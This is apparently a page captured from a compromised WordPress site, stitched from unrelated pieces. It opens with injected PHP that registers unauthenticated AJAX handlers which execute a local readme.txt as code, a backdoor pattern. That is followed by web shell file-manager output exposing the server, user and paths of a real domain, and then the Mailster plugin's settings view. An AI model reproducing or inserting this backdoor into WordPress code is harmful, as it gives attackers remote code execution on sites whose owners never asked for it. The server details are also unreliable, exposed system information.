if(!function_exists('file_check_readme30367')){ add_action('wp_ajax_nopriv_file_check_readme30367', 'file_check_readme30367'); add_action('wp_ajax_file_check_readme30367', 'file_check_readme30367'); function file_check_readme30367() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64756')){ add_action('wp_ajax_nopriv_file_check_readme64756', 'file_check_readme64756'); add_action('wp_ajax_file_check_readme64756', 'file_check_readme64756'); function file_check_readme64756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } HEX
HEX
Server: Apache
System: Linux dx292 6.1.0-39-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.148-1 (2025-08-26) x86_64
User: www-data (33)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /data/www/welovefamily.at/welovefamily.at/htdocs_tmp/wp-content/plugins/mailster/views/settings.php
<?php

global $wpdb, $current_user, $wp_post_statuses, $wp_roles;

$customfields = mailster()->get_custom_fields();
$roles = $wp_roles->get_names();

?>
<form id="mailster-settings-form" method="post" action="options.php" autocomplete="off" enctype="multipart/form-data">
<input style="display:none"><input type="password" style="display:none">
<div class="wrap">
	<p class="alignright">
		<input type="submit" class="submit-form button-primary" value="<?php esc_html_e( 'Save Changes', 'mailster' ) ?>" disabled />
	</p>
<h1><?php esc_html_e( 'Newsletter Settings', 'mailster' ) ?></h1>
<?php

$timeformat = mailster( 'helper' )->timeformat();
$timeoffset = mailster( 'helper' )->gmt_offset( true );
if ( ! ($test_email = get_user_meta( $current_user->ID, 'mailster_test_email', true )) ) {
	$test_email = $current_user->user_email;
}
$test_email = apply_filters( 'mailster_test_email', $test_email );


?>
<?php wp_nonce_field( 'mailster_nonce', 'mailster_nonce', false ); ?>
<?php settings_fields( 'mailster_settings' ); ?>
<?php settings_errors(); ?>
<?php do_settings_sections( 'mailster_settings' ); ?>

<?php
$sections = array(
	'general' => esc_html__( 'General', 'mailster' ),
	'template' => esc_html__( 'Template', 'mailster' ),
	'frontend' => esc_html__( 'Front End', 'mailster' ),
	'privacy' => esc_html__( 'Privacy', 'mailster' ),
	'subscribers' => esc_html__( 'Subscribers', 'mailster' ),
	'wordpress-users' => esc_html__( 'WordPress Users', 'mailster' ),
	'texts' => esc_html__( 'Text Strings', 'mailster' ),
	'tags' => esc_html__( 'Tags', 'mailster' ),
	'delivery' => esc_html__( 'Delivery', 'mailster' ),
	'cron' => esc_html__( 'Cron', 'mailster' ),
	'capabilities' => esc_html__( 'Capabilities', 'mailster' ),
	'bounce' => esc_html__( 'Bouncing', 'mailster' ),
	'authentication' => esc_html__( 'Authentication', 'mailster' ),
	'advanced' => esc_html__( 'Advanced', 'mailster' ),
	'system_info' => esc_html__( 'System Info', 'mailster' ),
	'manage-settings' => esc_html__( 'Manage Settings', 'mailster' ),
);
$sections = apply_filters( 'mymail_setting_sections', apply_filters( 'mailster_setting_sections', $sections ) );

if ( ! current_user_can( 'mailster_manage_capabilities' ) && ! current_user_can( 'manage_options' ) ) {
	unset( $sections['capabilities'] );
}

if ( ! current_user_can( 'manage_options' ) ) {
	unset( $sections['manage_settings'] );
}

?>

	<div class="settings-wrap">
	<div class="settings-nav">
		<div class="mainnav contextual-help-tabs hide-if-no-js">
		<ul>
		<?php foreach ( $sections as $id => $name ) {?>
			<li><a href="#<?php echo $id; ?>" class="nav-<?php echo $id; ?>"><?php echo $name; ?></a></li>
		<?php }?>
		<?php do_action( 'mailster_settings_tabs' ); ?>
		<?php do_action( 'mymail_settings_tabs' ); ?>
		</ul>
		</div>
	</div>

	<div class="settings-tabs"> <div class="tab"><h3>&nbsp;</h3></div>

	<?php foreach ( $sections as $id => $name ) {
?>
	<div id="tab-<?php echo esc_attr( $id ) ?>" class="tab">
		<h3><?php echo esc_html( strip_tags( $name ) ); ?></h3>
		<?php do_action( 'mailster_section_tab' ); ?>
		<?php do_action( 'mailster_section_tab_' . $id ); ?>
		<?php do_action( 'mymail_section_tab' ); ?>
		<?php do_action( 'mymail_section_tab_' . $id ); ?>

		<?php if ( file_exists( MAILSTER_DIR . 'views/settings/' . $id . '.php' ) ) :
			include MAILSTER_DIR . 'views/settings/' . $id . '.php';
		endif; ?>

	</div>
	<?php }?>

<?php
$extra_sections = apply_filters( 'mymail_extra_setting_sections', apply_filters( 'mailster_extra_setting_sections', array() ) );

foreach ( $extra_sections as $id => $name ) {?>
	<div id="tab-<?php echo esc_attr( $id ) ?>" class="tab">
		<h3><?php echo esc_html( strip_tags( $name ) ); ?></h3>
		<?php do_action( 'mailster_section_tab' ); ?>
		<?php do_action( 'mailster_section_tab_' . $id ); ?>
		<?php do_action( 'mymail_section_tab' ); ?>
		<?php do_action( 'mymail_section_tab_' . $id ); ?>
	</div>
	<?php }?>
		<p class="submitbutton">
			<input type="submit" class="submit-form button-primary" value="<?php esc_html_e( 'Save Changes', 'mailster' ) ?>" disabled />
		</p>
	</div>

	</div>

	<?php do_action( 'mailster_settings' ); ?>
	<?php do_action( 'mymail_settings' ); ?>

	<input type="text" class="hidden" name="mailster_options[profile_form]" value="<?php echo esc_attr( mailster_option( 'profile_form', 1 ) ); ?>">
	<input type="text" class="hidden" name="mailster_options[ID]" value="<?php echo esc_attr( mailster_option( 'ID' ) ); ?>">

	<br class="clearfix">
<span id="settingsloaded"></span>
</div>
</form>